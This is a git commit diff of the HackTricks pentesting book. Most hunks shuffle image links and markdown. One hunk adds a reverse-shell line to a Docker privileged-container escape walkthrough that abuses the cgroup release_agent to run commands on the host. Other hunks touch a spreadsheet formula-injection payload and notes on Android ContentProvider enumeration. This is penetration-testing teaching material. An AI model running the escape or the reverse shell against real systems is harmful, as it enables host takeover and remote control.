GitBook: [master] 9 pages and 27 assets modified

This commit is contained in:
CPol 2020-12-15 09:03:34 +00:00 committed by gitbook-bot
parent 987035fde6
commit 96d7f39ffb
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
23 changed files with 29 additions and 25 deletions

View file

Before

Width:  |  Height:  |  Size: 21 KiB

After

Width:  |  Height:  |  Size: 21 KiB

View file

Before

Width:  |  Height:  |  Size: 72 KiB

After

Width:  |  Height:  |  Size: 72 KiB

View file

Before

Width:  |  Height:  |  Size: 72 KiB

After

Width:  |  Height:  |  Size: 72 KiB

View file

Before

Width:  |  Height:  |  Size: 34 KiB

After

Width:  |  Height:  |  Size: 34 KiB

View file

Before

Width:  |  Height:  |  Size: 172 KiB

After

Width:  |  Height:  |  Size: 172 KiB

View file

Before

Width:  |  Height:  |  Size: 34 KiB

After

Width:  |  Height:  |  Size: 34 KiB

View file

Before

Width:  |  Height:  |  Size: 93 KiB

After

Width:  |  Height:  |  Size: 93 KiB

View file

Before

Width:  |  Height:  |  Size: 93 KiB

After

Width:  |  Height:  |  Size: 93 KiB

View file

Before

Width:  |  Height:  |  Size: 798 KiB

After

Width:  |  Height:  |  Size: 798 KiB

View file

Before

Width:  |  Height:  |  Size: 5.2 KiB

After

Width:  |  Height:  |  Size: 5.2 KiB

View file

Before

Width:  |  Height:  |  Size: 13 KiB

After

Width:  |  Height:  |  Size: 13 KiB

View file

Before

Width:  |  Height:  |  Size: 13 KiB

After

Width:  |  Height:  |  Size: 13 KiB

View file

Before

Width:  |  Height:  |  Size: 112 KiB

After

Width:  |  Height:  |  Size: 112 KiB

View file

@ -10,7 +10,7 @@ dht udp "DHT Nodes"
![](.gitbook/assets/image%20%28182%29.png)
![](.gitbook/assets/image%20%28345%29%20%282%29%20%282%29.png)
![](.gitbook/assets/image%20%28345%29%20%282%29%20%282%29%20%282%29.png)
InfluxDB

View file

@ -1,7 +1,5 @@
# HackTricks
![](.gitbook/assets/portada-alcoholica.png)
**Welcome to the page where you will find each trick/technique/whatever I have learnt in CTFs, real life apps and reading researches and news.**
@ -14,14 +12,14 @@ Here you will find the **typical flow** that **you should follow when pentesting
**Click in the title to start!**
If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, ****join the [💬](https://emojipedia.org/speech-balloon/) ****[**PEASS & HackTricks telegram group here**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
If you want to **share some tricks with the community** you can also submit **pull requests** to ****[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) ****that will be reflected in this book.
Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.
If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/) ****[**PEASS & HackTricks telegram group here**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
If you want to **share some tricks with the community** you can also submit **pull requests** to **\*\*\[**[https://github.com/carlospolop/hacktricks\*\*\]\(https://github.com/carlospolop/hacktricks](https://github.com/carlospolop/hacktricks**]%28https://github.com/carlospolop/hacktricks)\) **\*\*that will be reflected in this book.
Don't forget to** give ⭐ on the github\*\* to motivate me to continue developing this book.
![](.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67%20%286%29%20%284%29%20%286%29.png)
[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*
<a rel="license" href="http://creativecommons.org/licenses/by-sa/4.0/"><img alt="Creative Commons License" style="border-width:0" src="https://i.creativecommons.org/l/by-sa/4.0/88x31.png" /></a><br>Copyright © Carlos Polop 2020. Except where otherwise specified, the text on <a href="https://github.com/carlospolop/hacktricks">HACK TRICKS</a> by Carlos Polop is licensed under the <a href="https://creativecommons.org/licenses/by-sa/4.0/">Creative Commons Attribution-ShareAlike License 4.0 (International) (CC-BY-SA 4.0)</a>.
Copyright © Carlos Polop 2020. Except where otherwise specified, the text on [HACK TRICKS](https://github.com/carlospolop/hacktricks) by Carlos Polop is licensed under the [Creative Commons Attribution-ShareAlike License 4.0 \(International\) \(CC-BY-SA 4.0\)](https://creativecommons.org/licenses/by-sa/4.0/).

View file

@ -29,10 +29,17 @@ mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent
#For a normal PoC =================
echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd
#===================================
#Reverse shell
echo '#!/bin/bash' > /cmd
echo "bash -i >& /dev/tcp/10.10.14.21/9000 0>&1" >> /cmd
chmod a+x /cmd
#===================================
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
head /output
@ -58,7 +65,7 @@ A container would be vulnerable to this technique if run with the flags: `--secu
Now that we understand the requirements to use this technique and have refined the proof of concept exploit, lets walk through it line-by-line to demonstrate how it works.
To trigger this exploit we need a cgroup where we can create a `release_agent` file _and_ trigger `release_agent` invocation by killing all processes in the cgroup. The easiest way to accomplish that is to mount a cgroup controller and create a child cgroup.
To trigger this exploit we need a cgroup where we can create a `release_agent` file and trigger `release_agent` invocation by killing all processes in the cgroup. The easiest way to accomplish that is to mount a cgroup controller and create a child cgroup.
To do that, we create a `/tmp/cgrp` directory, mount the [RDMA](https://www.kernel.org/doc/Documentation/cgroup-v1/rdma.txt) cgroup controller and create a child cgroup \(named “x” for the purposes of this example\). While every cgroup controller has not been tested, this technique should work with the majority of cgroup controllers.
@ -68,7 +75,7 @@ Note that cgroup controllers are global resources that can be mounted multiple t
We can see the “x” child cgroup creation and its directory listing below.
```bash
```text
root@b11cf9eab4fd:/# mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
root@b11cf9eab4fd:/# ls /tmp/cgrp/
cgroup.clone_children cgroup.procs cgroup.sane_behavior notify_on_release release_agent tasks x
@ -82,7 +89,7 @@ The files we add or modify in the container are present on the host, and it is p
Those operations can be seen below:
```bash
```text
root@b11cf9eab4fd:/# echo 1 > /tmp/cgrp/x/notify_on_release
root@b11cf9eab4fd:/# host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
root@b11cf9eab4fd:/# echo "$host_path/cmd" > /tmp/cgrp/release_agent
@ -90,14 +97,14 @@ root@b11cf9eab4fd:/# echo "$host_path/cmd" > /tmp/cgrp/release_agent
Note the path to the `/cmd` script, which we are going to create on the host:
```bash
```text
root@b11cf9eab4fd:/# cat /tmp/cgrp/release_agent
/var/lib/docker/overlay2/7f4175c90af7c54c878ffc6726dcb125c416198a2955c70e186bf6a127c5622f/diff/cmd
```
Now, we create the `/cmd` script such that it will execute the `ps aux` command and save its output into `/output` on the container by specifying the full path of the output file on the host. At the end, we also print the `/cmd` script to see its contents:
```bash
```text
root@b11cf9eab4fd:/# echo '#!/bin/sh' > /cmd
root@b11cf9eab4fd:/# echo "ps aux > $host_path/output" >> /cmd
root@b11cf9eab4fd:/# chmod a+x /cmd
@ -108,7 +115,7 @@ ps aux > /var/lib/docker/overlay2/7f4175c90af7c54c878ffc6726dcb125c416198a2955c7
Finally, we can execute the attack by spawning a process that immediately ends inside the “x” child cgroup. By creating a `/bin/sh` process and writing its PID to the `cgroup.procs` file in “x” child cgroup directory, the script on the host will execute after `/bin/sh` exits. The output of `ps aux` performed on the host is then saved to the `/output` file inside the container:
```bash
```text
root@b11cf9eab4fd:/# sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
root@b11cf9eab4fd:/# head /output
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
@ -121,7 +128,6 @@ root 8 0.0 0.0 0 0 ? I< 13:57 0:00 [mm_percpu_wq]
root 9 0.0 0.0 0 0 ? S 13:57 0:00 [ksoftirqd/0]
root 10 0.0 0.0 0 0 ? I 13:57 0:00 [rcu_sched]
root 11 0.0 0.0 0 0 ? S 13:57 0:00 [migration/0]
```
## `--privileged` flag v2

View file

@ -59,7 +59,7 @@ content://com.mwr.example.sieve.DBContentProvider/Passwords/
You should also check the **ContentProvider code** to search for queries:
![](../../../.gitbook/assets/image%20%28121%29%20%281%29%20%281%29.png)
![](../../../.gitbook/assets/image%20%28121%29%20%281%29%20%281%29%20%281%29.png)
Also, if you can't find full queries you could **check which names are declared by the ContentProvider** on the `onCreate` method:
@ -76,7 +76,7 @@ When checking the code of the Content Provider **look** also for **functions** n
![](../../../.gitbook/assets/image%20%28211%29.png)
![](../../../.gitbook/assets/image%20%28254%29%20%281%29%20%281%29.png)
![](../../../.gitbook/assets/image%20%28254%29%20%281%29%20%281%29%20%281%29.png)
Because you will be able to call them

View file

@ -41,5 +41,5 @@ The good news is that **this payload is executed automatically when the file is
It's possible to execute a calculator with the following payload **`=cmd|' /C calc'!xxx`**
![](../.gitbook/assets/image%20%2861%29.png)
![](../.gitbook/assets/image%20%2825%29%20%281%29.png)

View file

@ -24,7 +24,7 @@ Accessing _/user/&lt;number&gt;_ you can see the number of existing users, in th
![](../../.gitbook/assets/image%20%2826%29.png)
![](../../.gitbook/assets/image%20%28227%29%20%281%29.png)
![](../../.gitbook/assets/image%20%28227%29%20%281%29%20%281%29.png)
## Hidden pages enumeration

View file

@ -183,7 +183,7 @@ It is recommended to disable Wp-Cron and create a real cronjob inside the host t
</methodCall>
```
![](../../.gitbook/assets/image%20%28107%29%20%282%29.png)
![](../../.gitbook/assets/image%20%28107%29%20%282%29%20%282%29.png)
![](../../.gitbook/assets/image%20%28224%29.png)

View file

@ -145,7 +145,7 @@ You can identify both of them checking the constants. Note that the sha\_init ha
Note the use of more constants
![](../../.gitbook/assets/image%20%28172%29.png)
![](../../.gitbook/assets/image%20%28253%29.png)
## CRC \(hash\)
@ -177,7 +177,7 @@ A CRC hash algorithm looks like:
The graph is quiet large:
![](../../.gitbook/assets/image%20%28343%29.png)
![](../../.gitbook/assets/image%20%28207%29%20%282%29.png)
Check **3 comparisons to recognise it**:

View file

@ -37,7 +37,7 @@ If you don't want to wait an hour you can use a PS script to make the restore ha
Note the spotless' user membership:
![](../../.gitbook/assets/1%20%282%29%20%281%29.png)
![](../../.gitbook/assets/1%20%282%29%20%281%29%20%281%29.png)
However, we can still add new users: